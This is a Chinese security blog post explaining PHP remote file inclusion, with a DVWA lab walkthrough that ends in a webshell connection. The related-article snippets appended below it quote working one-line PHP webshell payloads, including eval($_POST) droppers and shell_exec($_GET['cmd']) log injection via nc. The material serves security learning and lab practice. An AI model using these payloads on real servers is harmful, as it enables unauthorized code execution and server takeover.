文件上传漏洞之——远程文件包含漏洞(RFI)

最新推荐文章于 2025-09-27 09:59:30 发布
原创 最新推荐文章于 2025-09-27 09:59:30 发布 · 5k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞

本文深入探讨了PHP中远程文件包含漏洞的定义、原理及复现步骤。当allow_url_include配置项开启时,攻击者可通过URL加载并执行远程文件,实现命令执行。文章详细讲解了如何利用此漏洞获取服务器权限。

定义
如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令
原理
同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等
文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行
复现
dvwa low级别
1.在一个服务器下新建一个1.txt,写入一句话木马
在这里插入图片描述
2.访问此文件
在这里插入图片描述
3.通过菜刀连接getshell
在这里插入图片描述

WEB漏洞——文件上传
qq_63594215的博客
04-09 2155
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
远程文件包含漏洞
Ethan024的博客
04-08 891
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
文件包含漏洞详解
热门推荐
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
CTFHub RCE通关笔记5:文件包含 远程包含
最新发布
mooyuan的网络安全博客
09-27 1174
本文详细分析了CTFHub中RCE-文件包含关卡的利用方法。通过审计靶场PHP源码,发现开发者错误使用strpos()函数导致安全防护失效,允许包含flag开头的文件。文章介绍了两种攻击方法:1)利用php://input协议执行POST请求中的PHP代码;2)通过构造以flag开头的路径(如flag/../../../flag)绕过黑名单检查。实战演示了如何查看系统目录和读取flag文件内容。文章还指出正确的防护方法应使用strpos()===false进行严格比较,避免类型转换的安全风险。
远程文件包含
Just for fun
10-20 2511
远程文件包含(Remote File Inclusion),简称RFI,与其对应的是本地文件包含(Local File Inclusion,LFI),它们都是通过PHP的包含函数即:require(),require_once(),include()和include_once()来使用。   一般情况下,用户通过包含函数将具有特定功能的函数或类包含到当前脚本中,是没有什么问题的。但是有时候,为...
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1688
Web安全领域的探索之远程文件包含漏洞(LFI)
文件包含漏洞-01】文件包含概述及实例——以PHP语言为例
m0_64378913的博客
06-15 1060
定义:程序开发人员通常会把可重复使用的代码写到单个文件中,在使用该重复代码时,直接调用此文件,无需多次编写,这种调用文件的过程称为文件包含。 普适性:几乎所有脚本语言都会提供文件包含功能,本文主要以PHP语言为例进行介绍。(1)本文实验基于WAMP环境进行测试,环境部署过程参考文章《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》。 (2)在该环境网站根目录下,新建文件夹FileInclusion,在FileInclusion文件夹下新建以下文件进行实验。 (3)直接使用win20
DVWA之包含漏洞(file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞(file Inclusion)
weixin_45116657的博客
09-10 3234
hahaha
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 4273
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
36、远程文件包含漏洞
Web安全工具库
02-07 511
环境:DVWA,low级别 1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128 将yc.jpg照片拖入edjpgcom软件,添加下面这句话 <?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?> 2、访问一下该图片:http://192.168.152.128/yc.jpg 3...
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2891
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
Pikachu-File Inclusion-远程文件包含
guanrongl的专栏
10-04 976
是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。再次请求远程文件包含, filename 的值改为http://192.168.3.218:8000:test.php。首先,在D盘下构造一个 test.php 文件 ,可以看到,phpinfo 已经显示;PHP的需要php.ini中配置。
远程执行文件包含
weixin_30347335的博客
01-08 337
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
远程文件包含原理及利用
G3et的博客
01-27 921
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
文件包含漏洞远程文件包含
Xiongcanne的博客
04-25 1072
所需服务器:kalilinux apache2 打开靶机删除原有的一句话木马 使用kali打开apache2 在kali其中html文件夹中创建一个txt文件 键入i输入创建一句话木马的代码 我们使用浏览器打开txt文件,可以看到含有该代码 文件包含该链接,使其执行其中代码 成功创建一句话木马 接着就用中国蚁剑连接就行了。 ...
html 远程包含,文件包含远程文件包含
weixin_35042546的博客
06-23 422
远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 offowasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可这里使用apache;开启服务我们在网站的主目录下建立一个文件,webshell...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值